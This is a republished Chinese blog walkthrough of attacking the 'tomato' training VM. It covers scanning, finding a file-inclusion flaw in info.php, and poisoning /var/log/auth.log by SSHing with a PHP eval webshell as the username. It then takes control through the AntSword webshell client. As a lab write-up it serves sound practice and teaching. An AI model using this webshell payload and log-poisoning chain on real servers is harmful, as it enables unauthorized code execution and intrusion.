自学内容网 自学内容网

tomato-靶机渗透

tomato-靶机

一、安装靶机环境

下载双击.ova文件,写文件名路径导入

image-20240729163951152
打开虚拟机用NAT模式

image-20240729164230107

编辑–>虚拟网络编辑器查看IP段

image-20240729164258715

二、信息收集

1.御剑端口扫描查找该虚拟机的IP

image-20240729164847351

访问网站

image-20240729164853240

扫目录

dirb http://192.168.30.130 

image-20240729184105795

收集到目录

/server-status
/antibot_image/
/index.html

访问/antibot_image目录

image-20240729184513313

在目录下找到info.php

image-20240729184632414

查到

根目录:/var/www/html
用户名:webmaster@localhost

查看info.php源代码,提示image参数用于文件包含

image-20240729190126839

三、漏洞渗透

写image参数=linux的系统文件,发现成功显示,确定有文件包含漏洞

image-20240729190309073

2.发现端口没有全部扫描出来,使用这个命令扫描

nmap -A 192.168.30.130 -p-

image-20240729191712482

2211是ssl的连接端口

ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211

image-20240729193416587

然后在网页端查看ubuntu报错信息:/var/log/auth.log

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193644266

看到注入成功,然后用蚁剑

URL地址

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193444317

然后就可以控制整个文件


原文地址:https://blog.csdn.net/weixin_53736204/article/details/140779446

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!